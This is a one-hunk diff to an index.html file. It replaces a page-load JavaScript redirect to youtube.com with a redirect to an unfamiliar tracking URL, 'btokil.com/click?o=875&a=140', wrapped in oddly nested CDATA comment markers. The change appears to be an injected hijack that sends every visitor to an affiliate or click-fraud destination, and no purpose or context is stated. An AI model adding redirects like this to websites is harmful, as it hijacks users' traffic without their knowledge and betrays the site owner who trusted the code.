--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <script><!--//--><![CDATA[// ><!--
-location.href="https://www.youtube.com/"
+location.href="https://btokil.com/click?o=875&a=140"
 //--><!]]]]><![CDATA[>
 
 //--><!
